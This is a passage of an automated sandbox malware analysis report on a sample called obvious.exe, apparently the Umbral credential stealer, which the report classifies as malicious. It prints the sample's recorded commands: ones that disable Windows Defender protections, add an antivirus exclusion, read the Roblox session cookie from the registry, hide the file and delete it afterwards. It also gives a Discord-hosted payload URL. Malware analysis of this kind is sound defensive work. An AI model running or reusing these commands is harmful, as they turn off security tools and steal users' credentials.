Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://drive.google.com/drive/installwebapp?usp=chrome_default
Source: uGCIY.scr.0.dr | String found in binary or memory: https://github.com/Blank-c/Umbral-Stealer
Source: powershell.exe, 00000017.00000002.2088964363.000001E206122000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E207394000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://github.com/Pester/Pester
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61221000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gstatic.com
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61221000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://gstatic.com/generate_204
Source: obvious.exe, uGCIY.scr.0.dr | String found in binary or memory: https://gstatic.com/generate_204e==================Umbral
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://mail.google.com/mail/:
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://mail.google.com/mail/?usp=installed_webapp
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/J
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://mail.google.com/mail/installwebapp?usp=chrome_default
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61713000.00000004.00000800.00020000.00000000.sdmp, obvious.exe, 00000000.00000002.2327380876.0000012F612A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://media.discordapp.net/attachments/1176050474064019486/12780529320964
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61754000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://media.discordapp.net/attachments/1176050474064019486/1278052932096491550/Umbral-927537.zip?e
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F612A0000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://media.discordapp.net/attachments/1176050474064019486/12780529320964Pj
                        Source: powershell.exe, 00000005.00000002.1768715652.000001E0B9866000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1886772042.0000012BC9568000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1822175279.0000012BBAD6A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000A.00000002.1886772042.0000012BC9432000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024921D2D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2014778233.00000249304E2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.2014778233.0000024930618000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2230262740.000001E215F70000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E2078AA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2230262740.000001E2160A6000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                        Source: powershell.exe, 0000000A.00000002.1822175279.0000012BBAA48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024921BF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E207394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.org
                        Source: powershell.exe, 0000000A.00000002.1822175279.0000012BBAA48000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 0000000F.00000002.1916247926.0000024921BF6000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000017.00000002.2088964363.000001E207394000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://oneget.orgX
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/:
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/?feature=ytca
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/J
                        Source: obvious.exe, 00000000.00000002.2327380876.0000012F61766000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://www.youtube.com/s/notifications/manifest/cr_install.html
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49741
                        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49740
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
                        Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
                        Source: unknownHTTPS traffic detected: 162.159.136.232:443 -> 192.168.2.4:49740 version: TLS 1.2

Spam, unwanted Advertisements and Ransom Demands

Source: C:\Users\user\Desktop\obvious.exe | File written: C:\Windows\System32\drivers\etc\hosts

System Summary

Source: obvious.exe, type: SAMPLE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: 0.0.obvious.exe.12f5f5a0000.0.unpack, type: UNPACKEDPE | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr, type: DROPPED | Matched rule: Detects executables attemping to enumerate video devices using WMI Author: ditekSHen
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BAE3218
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BB089C0
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BAEB128
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BAE5760
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BADDFD0
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BAEAF45
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BAF1680
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BB245A0
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BB24528
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BAE445E
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BAE8C36
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BADF088
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BAE1CB6
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BC97399
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BCA02F0
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BCA69E1
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BCA89E2
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BCA06CD
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BCA364C
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BC96C65
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BC9DC67
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BC92438
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BC9092C
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BC93060
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BC967C5
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BC9BE32
Source: C:\Users\user\Desktop\obvious.exe | Code function: 0_2_00007FFD9BCA6E43
Source: obvious.exe, 00000000.00000000.1680368592.0000012F5F5DC000.00000002.00000001.01000000.00000003.sdmp | Binary or memory string: OriginalFilename vs obvious.exe
Source: obvious.exe | Binary or memory string: OriginalFilename vs obvious.exe
Source: obvious.exe | Static PE information: EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
Source: obvious.exe, type: SAMPLE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: 0.0.obvious.exe.12f5f5a0000.0.unpack, type: UNPACKEDPE | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\uGCIY.scr, type: DROPPED | Matched rule: INDICATOR_SUSPICIOUS_EXE_WMI_EnumerateVideoDevice author = ditekSHen, description = Detects executables attemping to enumerate video devices using WMI
Source: obvious.exe, ----.cs | Base64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
Source: obvious.exe, -------.cs | Base64 encoded string: 'VoeLMljCcEVYfU8W72kDheVSIJZdBPUywVEujaMaKUX+PC3GIKJuwMiEe7SihdddwhgBZHoukcGwL8nohVpawkFH+1KHFQgONA+o1YtwWGfTOU3PHEhJpJmERZeGm0av3EWAZqAkP4emgxmXrx3wjZ4oQelWGSkFuJJzen3g9AooZA4nXbYa93I='
Source: uGCIY.scr.0.dr, ----.cs | Base64 encoded string: 'U2V0LU1wUHJlZmVyZW5jZSAtRGlzYWJsZUludHJ1c2lvblByZXZlbnRpb25TeXN0ZW0gJHRydWUgLURpc2FibGVJT0FWUHJvdGVjdGlvbiAkdHJ1ZSAtRGlzYWJsZVJlYWx0aW1lTW9uaXRvcmluZyAkdHJ1ZSAtRGlzYWJsZVNjcmlwdFNjYW5uaW5nICR0cnVlIC1FbmFibGVDb250cm9sbGVkRm9sZGVyQWNjZXNzIERpc2FibGVkIC1FbmFibGVOZXR3b3JrUHJvdGVjdGlvbiBBdWRpdE1vZGUgLUZvcmNlIC1NQVBTUmVwb3J0aW5nIERpc2FibGVkIC1TdWJtaXRTYW1wbGVzQ29uc2VudCBOZXZlclNlbmQgJiYgcG93ZXJzaGVsbCBTZXQtTXBQcmVmZXJlbmNlIC1TdWJtaXRTYW1wbGVzQ29uc2VudCAy'
Source: uGCIY.scr.0.dr, -------.cs | Base64 encoded string: 'VoeLMljCcEVYfU8W72kDheVSIJZdBPUywVEujaMaKUX+PC3GIKJuwMiEe7SihdddwhgBZHoukcGwL8nohVpawkFH+1KHFQgONA+o1YtwWGfTOU3PHEhJpJmERZeGm0av3EWAZqAkP4emgxmXrx3wjZ4oQelWGSkFuJJzen3g9AooZA4nXbYa93I='
Source: uGCIY.scr.0.dr, ----.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: uGCIY.scr.0.dr, ----.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: obvious.exe, ----.cs | Security API names: System.Security.Principal.WindowsPrincipal.IsInRole(System.Security.Principal.WindowsBuiltInRole)
Source: obvious.exe, ----.cs | Security API names: System.Security.Principal.WindowsIdentity.GetCurrent()
Source: classification engine | Classification label: mal100.troj.adwa.spyw.evad.winEXE@39/23@3/2
Source: C:\Users\user\Desktop\obvious.exe | File created: C:\Users\user\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\obvious.exe.log
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8020:120:WilError_03
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Mutant created: NULL
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:3736:120:WilError_03
Source: C:\Users\user\Desktop\obvious.exe | Mutant created: \Sessions\1\BaseNamedObjects\Ias6tBDXXaWYdVykfgAQ
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:4280:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7868:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:8140:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7780:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:2568:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7856:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7736:120:WilError_03
Source: C:\Windows\System32\conhost.exe | Mutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7640:120:WilError_03
Source: C:\Users\user\Desktop\obvious.exe | File created: C:\Users\user\AppData\Local\Temp\hGQwf2dJC9byEfm
Source: obvious.exe | Static PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: obvious.exe | Static file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.80%
Source: C:\Users\user\Desktop\obvious.exe | Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers
Source: C:\Users\user\Desktop\obvious.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: obvious.exe, 00000000.00000002.2327380876.0000012F61560000.00000004.00000800.00020000.00000000.sdmp, KtE6mRAFZ5iEcgF.0.dr | Binary or memory string: CREATE TABLE password_notes (id INTEGER PRIMARY KEY AUTOINCREMENT, parent_id INTEGER NOT NULL REFERENCES logins ON UPDATE CASCADE ON DELETE CASCADE DEFERRABLE INITIALLY DEFERRED, key VARCHAR NOT NULL, value BLOB, date_created INTEGER NOT NULL, confidential INTEGER, UNIQUE (parent_id, key));
Source: obvious.exe | ReversingLabs: Detection: 78%
Source: C:\Users\user\Desktop\obvious.exe | File read: C:\Users\user\Desktop\obvious.exe
Source: unknown | Process created: C:\Users\user\Desktop\obvious.exe "C:\Users\user\Desktop\obvious.exe"
Source: C:\Users\user\Desktop\obvious.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\obvious.exe | Process created: C:\Windows\System32\attrib.exe "attrib.exe" +h +s "C:\Users\user\Desktop\obvious.exe"
Source: C:\Windows\System32\attrib.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\obvious.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Add-MpPreference -ExclusionPath 'C:\Users\user\Desktop\obvious.exe'
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\wbem\WmiPrvSE.exe C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Source: C:\Users\user\Desktop\obvious.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Set-MpPreference -DisableIntrusionPreventionSystem $true -DisableIOAVProtection $true -DisableRealtimeMonitoring $true -DisableScriptScanning $true -EnableControlledFolderAccess Disabled -EnableNetworkProtection AuditMode -Force -MAPSReporting Disabled -SubmitSamplesConsent NeverSend && powershell Set-MpPreference -SubmitSamplesConsent 2
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\obvious.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKCU:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\obvious.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path HKLN:SOFTWARE\Roblox\RobloxStudioBrowser\roblox.com -Name .ROBLOSECURITY
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\obvious.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" os get Caption
Source: C:\Users\user\Desktop\obvious.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" computersystem get totalphysicalmemory
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\obvious.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic.exe" csproduct get uuid
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\obvious.exe | Process created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "powershell.exe" Get-ItemPropertyValue -Path 'HKLM:System\CurrentControlSet\Control\Session Manager\Environment' -Name PROCESSOR_IDENTIFIER
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\obvious.exe | Process created: C:\Windows\System32\wbem\WMIC.exe "wmic" path win32_VideoController get name
Source: C:\Windows\System32\wbem\WMIC.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Users\user\Desktop\obvious.exe | Process created: C:\Windows\System32\cmd.exe "cmd.exe" /c ping localhost && del /F /A h "C:\Users\user\Desktop\obvious.exe" && pause
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\PING.EXE ping localhost
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: mscoree.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: apphelp.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: kernel.appcore.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: version.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: windows.storage.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: wldp.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: profapi.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: cryptsp.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: rsaenh.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: cryptbase.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: iphlpapi.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: dnsapi.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: dhcpcsvc6.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: dhcpcsvc.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: winnsi.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: rasapi32.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: rasman.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: rtutils.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: mswsock.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: winhttp.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: ondemandconnroutehelper.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: rasadhlp.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: fwpuclnt.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: secur32.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: sspicli.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: schannel.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: mskeyprotect.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: ntasn1.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: ncrypt.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: ncryptsslp.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: msasn1.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: gpapi.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: ntmarta.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: dpapi.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: sxs.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: devenum.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: winmm.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: devobj.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: msdmo.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: uxtheme.dll
Source: C:\Users\user\Desktop\obvious.exe | Section loaded: windowscodecs.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iphlpapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: framedynos.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sspicli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: wbemcomn.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: msxml6.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: urlmon.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: iertutil.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: srvcli.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: netutils.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: uxtheme.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vcruntime140_1.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: userenv.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: profapi.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: vbscript.dll
Source: C:\Windows\System32\wbem\WMIC.exe | Section loaded: sxs.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: ulib.dll
Source: C:\Windows\System32\attrib.exe | Section loaded: fsutilext.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: atl.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: mscoree.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: kernel.appcore.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: version.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: vcruntime140_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: ucrtbase_clr0400.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptsp.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: rsaenh.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: cryptbase.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: amsi.dll
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe | Section loaded: userenv.dll
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: profapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: windows.storage.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wldp.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wshext.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: appxsip.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: opcservices.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: sspicli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: uxtheme.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: urlmon.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: iertutil.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: srvcli.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: netutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: propsys.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wininet.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: microsoft.management.infrastructure.native.unmanaged.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wmidcom.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: dpapi.dllJump to behavior
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: fastprox.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: ncobjapi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wbemcomn.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: kernel.appcore.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mpclient.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: userenv.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: version.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: msasn1.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: wmitomi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: mi.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: miutils.dllJump to behavior
                        Source: C:\Windows\System32\wbem\WmiPrvSE.exeSection loaded: gpapi.dllJump to behavior
                        Source: C:\Windows\System32\PING.EXE Section loaded: iphlpapi.dll
                        Source: C:\Windows\System32\PING.EXE Section loaded: mswsock.dll
